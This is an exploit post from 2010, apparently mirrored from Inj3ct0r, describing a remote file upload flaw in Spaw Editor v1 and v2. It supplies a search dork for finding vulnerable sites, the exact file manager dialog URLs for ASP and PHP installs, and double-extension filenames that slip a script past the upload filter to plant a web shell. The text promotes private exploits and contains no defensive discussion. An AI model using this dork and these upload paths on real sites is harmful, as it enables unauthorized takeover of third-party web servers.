Home / os / win7

Spaw Editor v1.0 & 2.0 Remote File Upload

Posted on 20 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Spaw Editor v1.0 &amp; 2.0 Remote File Upload</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================
Spaw Editor v1.0 &amp; 2.0 Remote File Upload
=========================================


# Date....................: [20-05-2010]
# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [Spaw Editor v1 &amp; v2]
# Impact..................: [Remote]
# Site Software ..........: [http://www.spaweditor.com]
# Sptnx ..................: [CmOs_Clr &amp; Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz &amp; priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]
 
# Vulnerability: Remote File Upload .
 
# Part ExplOit &amp; Bug Codes :
 
Dork [ allinurl:spaw2/dialogs/ ]
 
Exploit :
 
For Windows &amp; ASP Sites :
 
/spaw2/dialogs/dialog.aspx?module=spawfm&amp;dialog=spawfm&amp;theme=spaw2&amp;lang=en&amp;charset=utf-8&amp;scid=2d0650b7920a4fbf87598f8d58b4a99b&amp;type=images
 
/spaw2/uploads/files/sec4ever.asp;.jpg
 
=====================================
 
For Linux PHP :
 
/spaw2/dialogs/dialog.php?module=spawfm&amp;dialog=spawfm&amp;theme=spaw2&amp;lang=en&amp;charset=utf-8&amp;scid=2d0650b7920a4fbf87598f8d58b4a99b&amp;type=files
 
/spaw2/uploads/files/sec4ever.jpg.php
 
=====================================
 
Special Thanks to : Exploit-db Team &amp;  Www.Sec4ever.com/home [ Latest Shellcodez - Security News - Priv8 Exploits &amp;
 Localz ] .


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :